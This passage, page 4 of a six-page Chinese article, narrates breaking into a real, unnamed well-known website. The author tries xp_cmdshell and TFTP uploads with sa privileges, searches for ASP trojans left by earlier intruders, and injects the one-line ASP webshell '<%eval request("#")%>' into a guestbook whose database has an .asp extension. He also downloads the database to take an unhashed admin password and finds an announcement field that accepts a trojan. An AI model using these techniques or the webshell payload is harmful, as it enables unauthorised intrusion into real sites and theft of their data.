多图详解:入侵国内某知名网站记录(4)
上传文件失败了 提示“上传文件不成功!”怎么办?没事既然是sa的权限不能这样上传还有别的办法,试了试用xp_cmdshell直接加用户,TFTP上传,写脚本上传统统失败了! 笔者想,既然这个站已经被人入侵过了,那么肯定会留下一些ASP木马要是能找到一个小的ASP木马不就可以上传大马了?继续找,再次来到网站目录下挨个看文件夹,突然看到一个MDB的目录,心情开始激动了,颤抖的手点了下去。图11尝试一下这个目录可否上传 里面有个guestbook.asp还有个a.asp,看看路径写着d:xxxxhomeliuyanmdb,各位读者猜到这是什么了么?对了留言板! 我们知道了默认数据库路径而且数据库以ASP结尾,如果在留言中插入那个一句话的ASP木马提交这样就会记录在数据库中,而数据库又是ASP结尾的这样就跟一个ASP木马一样了,访问数据库web地址页面出现了乱码,图12 页面出现了乱码 这样就是没有做防下载处理,然后马上在留言板中留言在“主页”还有其他地方都输入了“ <%eval request("#")%> ”提交成功,用海洋c端连接发现还是不成功(可能是被过滤掉了吧!)!怎么办呢?于是用迅雷下载了这个ASP数据库改名为MDB后打开,找出管理员账号密码,图13 管理员密码居然是没有MD5加密 登陆留言板,经过测试发现在管理员页面的公告中可以插入木马,图14 公告是脆弱的地方,可以插入木马
首页 上页 | ...1| 2 | 3 | 4 | 5 | 6 | 下页 尾页 共 6 页